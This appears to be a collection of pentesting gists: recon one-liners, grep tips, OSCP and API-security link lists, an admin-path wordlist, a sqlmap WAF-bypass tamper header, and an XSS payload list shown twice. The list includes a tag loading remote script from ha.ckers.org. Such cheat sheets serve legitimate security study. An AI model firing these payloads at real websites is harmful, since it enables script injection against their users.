Spy0x7

#!/bin/bash

HTB_DATA_DIR=~/Documents/HTB/

if [[ $1 ]]; then
	a=1
else
	echo "Usage: $0 <Box name>"
	exit 1
fi

Spy0x7

#!/usr/bin/env python

"""
sqlmap tamper script for bypassing WAF
g4mm4 is my hero
"""
import re
import random
from lib.core.data import kb
from lib.core.enums import PRIORITY

Spy0x7

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>

Spy0x7

# Pull Resolved Hosts From .gnmap Files
grep "Host: " *.gnmap|sed 's/\t/ /g'|tr -s '[:space:]'|cut -d" " -f3|awk '!/\(\)/'|sort -u|sed 's/(//g;s/)//g'

# Pull Alive Host IPs Based on Open Port From .gnmap Files
grep "Host:.*Ports:.*/open/" *.gnmap|cut -d" " -f2

# Pull Alive Host IPs Based on Status Form .gnmap Files (Varying Results Based On Scan Flags [i.e.: -Pn])
grep "Host:.*Status: Up" *.gnmap|cut -d" " -f2

# Common Discovery Scan String (Known RTT)

Spy0x7

bash,pentesting one-liners and stuff
Basics
grep case insensitive
grep -i "<this>" <file>
grep recursively
grep -ir "<this>" <directory>
grep with word match only (string starting/ending with non-word constituent character)
grep -wi "<this>" <file>
remove/delete filename from grep output
grep -hi "<this>" <file>

Spy0x7

/admin/admin.js
/admin/appinfo.jsp
/admin/cache_stats.jsp
/admin/catalogcache.jsp
/admin/ccms/customizing.jsp
/admin/ccms/result.jsp
/admin/ccms/sendFailure.jsp
/ecall/jsp/customer/login/login.jsp
/ecall/jsp/customer/upload/upload.jsp
/user/admin/index.jsp

Spy0x7

#notes
https://www.cnblogs.com/keepmoving1113/tag/OSCP/
https://hausec.com/pentesting-cheatsheet/
https://highon.coffee/blog/penetration-testing-tools-cheat-sheet
https://github.com/wwong99/pentest-notes/blob/master/oscp_resources/OSCP-Survival-Guide.md
https://noobsec.net/oscp-cheatsheet/
https://www.netsecfocus.com/oscp/2019/03/29/The_Journey_to_Try_Harder-_TJNulls_Preparation_Guide_for_PWK_OSCP.html
https://www.reddit.com/r/oscp/comments/824v7z/oscp_exam_taking_fraud/
https://github.com/OlivierLaflamme/Cheatsheet-God
https://johntuyen.com/personal/2019/05/25/personal-oscpcheatsheet.html

Spy0x7

https://github.com/HolyBugx/HolyTips
https://www.apiopscycles.com/api-audit-checklist
https://github.com/inonshk/31-days-of-API-Security-Tips
https://github.com/shieldfy/API-Security-Checklist
https://web.archive.org/web/20210607123429/https://www.binarybrotherhood.io/oauth2_threat_model.html
https://assets.pentesterlab.com/jwt_security_cheatsheet/jwt_security_cheatsheet.pdf
https://cheatsheetseries.owasp.org/cheatsheets/Microservices_security.html
https://cheatsheetseries.owasp.org/cheatsheets/GraphQL_Cheat_Sheet.html
https://apisecurity.io/encyclopedia/content/owasp-api-security-top-10-cheat-sheet-a4.pdf
https://cheatsheetseries.owasp.org/cheatsheets/REST_Assessment_Cheat_Sheet.html

Spy0x7

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>

Spy0x7

#!/bin/bash
curl -s "https://urlscan.io/api/v1/search/?q=domain:$1" | grep -E '"url"' | cut -d '"' -f4 | grep -F $1 | sort -u